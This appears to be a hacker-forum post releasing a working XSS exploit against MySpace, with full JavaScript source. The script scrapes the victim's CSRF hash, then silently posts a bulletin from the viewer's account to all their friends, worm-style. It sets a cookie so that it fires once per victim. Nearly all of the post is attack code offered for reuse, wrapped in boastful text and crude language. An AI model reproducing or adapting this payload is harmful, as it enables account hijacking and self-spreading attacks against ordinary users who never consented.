MySpace Exploit found By Smokey & MX

Ok basically what this exploit does, it uses an active XSS vuln to automaticly post a buddy bulletin from whomever views your site. Example

User A visits our site
User A has now sent out a Buddy Bulletin to all his friend with whatever we want it to say

There are many variations of this exploit that you can do, this however is the one I am making public.

Here is your JS code

 // MySpace bulletin raper by Smokey // JS File coding based on MX vBulletin worm but modified by Smokey // Force bulletin posting and XSS method found by TrainReq & Smokey & MX   //Defines what cookie we are looking for var cookie  = document.cookie; var checkcok = cookie.match(/posted/);  //Defines how the get request is going to work when we grab the hash value  function getNewHttpObject() { var objType = false; try { objType = new ActiveXObject('Msxml2.XMLHTTP'); } catch(e) { try { objType = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { objType = new XMLHttpRequest(); } } return objType; } function getAXAH(url){  var theHttpRequest = getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAH();}; theHttpRequest.open("GET", url); theHttpRequest.send(false);  function processAXAH(){ if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) {  var str = theHttpRequest.responseText;  //finds the hash var hash = str.match(/&hash=([^"]+)&My/);   //Defines subject and body var subject = 'Smokey & Kristi are the best!'; var body = '%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Cfont+size%3D%225%22+color%3D%22red%22%3E+Smokey+has+owned+my+account%21%21%3C%2Ffont%3E%3Cbr%3E%3Cbr%3E%3Cfont+size%3  
D%223%22%3ESup+MySpace%21++I+have+once+again+found+an+epic+sploit%21+I+am+master+of+MySpace%2C+and+no+one+forget+that%21+I+want+everyone+to+ph3ar+mi+u 
b3r+l33t+h4x%21%2111%21%21%21%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%2Ffont%3E+I+am+not+bulletin+raping+for+spite%2Fhate+%2C+its+simply+for+the+fuxaround+%26lt%3B 
3%3C%2Fcenter%3E%3Cbr%3E%3Cbr%3EKeep+it+nerdy+DG+style%3Cbr%3E-Smokey%3Cbr%3E+I+love+Kristi+Lee%21'  //If user hasn't already posted set a cookie and post if (checkcok  == null){ document.cookie = "posted=true; path=/;domain=.myspace.com;";  // Posts all the information postAXAH('http://' + document.location.host + '/index.cfm?fuseaction=bulletin.confirmation&mode=5&groupID=0&userID=-1&authorID=0&messageID=0&commentID=0&commentAuthorID=0', 'groupID=0&hashcode=' + hash[1] + '&hash=' + hash[1] + '&subject='+ subject +'&body='+ body +'&allowBulletinComments=1&mode=0');  } } } } }       //Gets information off of the bulletin space function postAXAH(url, params) { var theHttpRequest = getNewHttpObject();  theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);}; theHttpRequest.open("POST", url); theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2'); theHttpRequest.send(params);  function processAXAHr(elementContainer){ if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) {  } } } }  getAXAH('http://' + document.location.host + '/index.cfm?fuseaction=bulletin');